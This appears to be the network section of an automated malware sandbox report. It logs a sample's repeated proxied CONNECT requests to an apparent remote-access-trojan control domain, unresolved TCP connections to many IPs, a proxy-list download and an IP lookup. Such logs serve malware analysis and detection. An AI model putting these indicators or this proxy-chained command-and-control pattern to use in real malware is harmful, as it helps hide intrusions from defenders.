                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.241.6.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 203.161.32.242
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.141.177.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.187.55.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.186.8.162
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.141.66.78
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.169.130.46
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.74.91.244
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.11.95.165
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.77.111.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.219.180.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 160.248.80.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.67.254.127
                  Source: unknownTCP traffic detected without corresponding DNS query: 154.72.90.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.26.108.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.204.134.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 72.167.222.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.217.226.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 190.186.237.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 152.32.78.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 201.20.67.70
                  Source: unknownTCP traffic detected without corresponding DNS query: 117.70.49.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.241.70.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 14.103.24.148
                  Source: unknownTCP traffic detected without corresponding DNS query: 207.180.234.220
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.120.30.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.16.226.6
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.54.237.34
                  Source: unknownTCP traffic detected without corresponding DNS query: 3.24.58.156
                  Source: unknownTCP traffic detected without corresponding DNS query: 43.133.136.208
                  Source: unknownTCP traffic detected without corresponding DNS query: 200.174.198.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.56.220.210
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.226.232.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.21.6.88
                  Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: github.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:40 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:40 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 